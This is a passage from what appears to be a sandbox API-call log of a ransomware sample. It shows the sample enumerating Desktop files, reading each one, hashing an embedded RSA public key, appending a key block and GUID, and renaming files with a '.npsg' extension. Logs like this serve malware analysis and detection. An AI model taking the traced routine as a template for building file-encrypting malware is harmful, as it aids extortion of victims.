hFile=0x644, liDistanceToMove=0x12dd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.106] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.108] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.108] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x12dfb, lpOverlapped=0x0) returned 1 [0236.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.109] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.109] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.111] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.111] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.111] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.111] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.111] GetLastError () returned 0x0 [0236.111] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.111] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.111] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.111] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.111] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x12e00) returned 0x3b95d50 [0236.113] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0236.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94e88 [0236.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b94ed0 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff90 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400020 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0236.114] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3ba8b58 [0236.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3ba8b58 | out: hHeap=0x620000) returned 1 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400020 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400008 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400020 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400008 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400068 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0236.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.115] GetCurrentThreadId () returned 0x5b4 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x6881b0 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.116] GetCurrentThreadId () returned 0x5b4 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400068 [0236.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400008 [0236.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400020 [0236.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffa8 [0236.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400080 [0236.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400050 [0236.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400038 [0236.118] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x12dfb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.118] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.119] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.119] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.119] CloseHandle (hObject=0x644) returned 1 [0236.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b7fcd0 [0236.122] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BLK5--Ya.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\blk5--ya.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BLK5--Ya.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\blk5--ya.m4a.npsg")) returned 1 [0236.124] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b4bab40, ftCreationTime.dwHighDateTime=0x1d5bc30, ftLastAccessTime.dwLowDateTime=0x73297440, ftLastAccessTime.dwHighDateTime=0x1d5c580, ftLastWriteTime.dwLowDateTime=0x73297440, ftLastWriteTime.dwHighDateTime=0x1d5c580, nFileSizeHigh=0x0, nFileSizeLow=0x493f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cz0fxR.flv", cAlternateFileName="")) returned 1 [0236.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.124] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cz0fxR.flv") returned=".flv" [0236.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cz0fxR.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cz0fxr.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.124] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=18751) returned 1 [0236.124] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.127] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4919, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.127] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.129] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x493f, lpOverlapped=0x0) returned 1 [0236.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.130] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.131] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.131] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.131] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.131] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.131] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.131] GetLastError () returned 0x0 [0236.131] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.131] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.131] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.131] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.132] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.132] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x346fd28 [0236.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b84618 [0236.132] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x493f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.132] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.133] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.133] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.133] CloseHandle (hObject=0x644) returned 1 [0236.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b7fcd0 [0236.137] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cz0fxR.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cz0fxr.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cz0fxR.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cz0fxr.flv.npsg")) returned 1 [0236.138] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0236.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.138] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0236.138] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41aee250, ftCreationTime.dwHighDateTime=0x1d5c383, ftLastAccessTime.dwLowDateTime=0x3917a020, ftLastAccessTime.dwHighDateTime=0x1d5c34f, ftLastWriteTime.dwLowDateTime=0x3917a020, ftLastWriteTime.dwHighDateTime=0x1d5c34f, nFileSizeHigh=0x0, nFileSizeLow=0xf05a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EEIWxf1e4oDyL6.odt", 